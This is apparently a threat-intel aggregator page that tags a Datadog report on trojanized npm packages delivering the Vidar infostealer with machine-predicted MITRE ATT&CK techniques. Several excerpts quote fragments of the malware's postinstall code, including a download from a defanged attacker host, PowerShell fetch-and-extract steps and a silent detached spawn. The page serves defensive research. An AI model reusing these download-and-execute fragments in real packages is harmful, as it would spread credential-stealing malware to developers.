TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Datadog Security Labs

MUT-4831: Trojanized npm packages deliver Vidar infostealer malware

2025-11-06 · Read original ↗

ATT&CK techniques detected

20 predictions
T1195.001Compromise Software Dependencies and Development Tools
97%
“response and recovery cycles. in order to enable further research, we have published all mut - 4831 campaign packages to our public malicious package dataset. conclusion open source package registries such as npm are fertile territory for threat actors like mut - 4831 : the infor…”
T1195.001Compromise Software Dependencies and Development Tools
96%
“mut - 4831 : trojanized npm packages deliver vidar infostealer malware key points and observations - datadog security research has detected 17 npm packages ( 23 releases ) containing downloader malware that executes via a postinstall script and targeting windows systems - the pac…”
T1195.001Compromise Software Dependencies and Development Tools
96%
“accounts, respectively, contain c2 domains associated with vidar, which are regularly updated as infrastructure is rotated. the executable thus first calls home to the telegram and steam profiles to discover which second - order c2 infrastructure is currently active. the original…”
T1105Ingress Tool Transfer
94%
“) { try { log ( ' [ main ] = = = = = starting main process = = = = = ' ) ; const downloadurl = ' https : / / upload. bullethost [. ] cloud / download / 68f55d7834645ddd64ba3e3e ' ; / / update this with your valid download url const zippath = path. join ( process. env. temp, ' blt…”
T1195.001Compromise Software Dependencies and Development Tools
94%
“days old at the time of the first detection, indicating that the accounts were recently created by mut - 4831, probably for use in this campaign. with one exception, all packages published by these two accounts contained the campaign indicators. at the time of writing, both aartj…”
T1195.001Compromise Software Dependencies and Development Tools
91%
“this case, we see that the node. js script in src / dependencies. js is being executed as a postinstall script. on examining the contents of this script ( see next section ), we confirmed the package is indeed malicious. in two bursts, over the periods of october 21 - 22 and 26, …”
T1195.001Compromise Software Dependencies and Development Tools
90%
“' https : / / api. telegram. org ' ; npm - silent - process - execution : found 2 source code matches * this package is silently executing another executable at package / lib / dependencies. js : 170 var child = spawn ( exepath, [ ], { detached : true, stdio : ' ignore ' } ) ; * …”
T1195.001Compromise Software Dependencies and Development Tools
87%
“like npm and pypi for signs of threat actor activity. we do so using guarddog, a cli static analyzer for identifying suspicious and potentially malicious signatures in package code and metadata. initial discovery on october 21, 2025, guarddog flagged the npm package custom - tg -…”
T1059.001PowerShell
86%
“##tall powershell script, embedded directly in the package. json file, to perform the zip archive download step. we observed two distinct powershell scripts used in this capacity, identical up to log messages. the more elaborate of the two is shown below, formatted for clarity. p…”
T1204.002Malicious File
85%
“follow, especially thanks to the inclusion of comments and even log messages ( indicative of a possible vibecoded origin for this script ) : - download an encrypted zip archive from the bullethost [. ] cloud domain to a local file - decrypt and extract the archive, using the same…”
T1560.001Archive via Utility
76%
“zip - - path = bltjqzun. zip type = zip physical size = 1416746 date time attr size compressed name - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -..... 2924408 1416590 bridle. exe - -…”
T1587Develop Capabilities
68%
“mut - 4831 : trojanized npm packages deliver vidar infostealer malware key points and observations - datadog security research has detected 17 npm packages ( 23 releases ) containing downloader malware that executes via a postinstall script and targeting windows systems - the pac…”
T1587Develop Capabilities
65%
“accounts, respectively, contain c2 domains associated with vidar, which are regularly updated as infrastructure is rotated. the executable thus first calls home to the telegram and steam profiles to discover which second - order c2 infrastructure is currently active. the original…”
T1204.002Malicious File
62%
“txt ' ; } else { write - host ' [ postinstall ] error : extract. js not found at ' $ extractscript ; } } catch { write - host ' [ postinstall ] error : ' $ _. exception. message ; } } \ " after downloading the target zip archive, this powershell script hands over control to a nod…”
T1587Develop Capabilities
62%
“' https : / / api. telegram. org ' ; npm - silent - process - execution : found 2 source code matches * this package is silently executing another executable at package / lib / dependencies. js : 170 var child = spawn ( exepath, [ ], { detached : true, stdio : ' ignore ' } ) ; * …”
T1587Develop Capabilities
56%
“response and recovery cycles. in order to enable further research, we have published all mut - 4831 campaign packages to our public malicious package dataset. conclusion open source package registries such as npm are fertile territory for threat actors like mut - 4831 : the infor…”
T1587Develop Capabilities
55%
“like npm and pypi for signs of threat actor activity. we do so using guarddog, a cli static analyzer for identifying suspicious and potentially malicious signatures in package code and metadata. initial discovery on october 21, 2025, guarddog flagged the npm package custom - tg -…”
T1204.005Malicious Library
35%
“like npm and pypi for signs of threat actor activity. we do so using guarddog, a cli static analyzer for identifying suspicious and potentially malicious signatures in package code and metadata. initial discovery on october 21, 2025, guarddog flagged the npm package custom - tg -…”
T1059.001PowerShell
34%
“txt ' ; } else { write - host ' [ postinstall ] error : extract. js not found at ' $ extractscript ; } } catch { write - host ' [ postinstall ] error : ' $ _. exception. message ; } } \ " after downloading the target zip archive, this powershell script hands over control to a nod…”
T1059.007JavaScript
34%
“##host [. ] cloud / download / 68f5503834645ddd64ba3e17 ' - outfile $ env : temp \ \ bltjqzun. zip - erroraction stop ; write - host ' [ postinstall ] download complete, file size : ' ( get - item $ env : temp \ \ bltjqzun. zip ). length ' bytes ' ; $ extractscript = join - path …”

Summary

Analysis of a threat actor campaign targeting Windows users with Vidar infostealer malware via malicious npm packages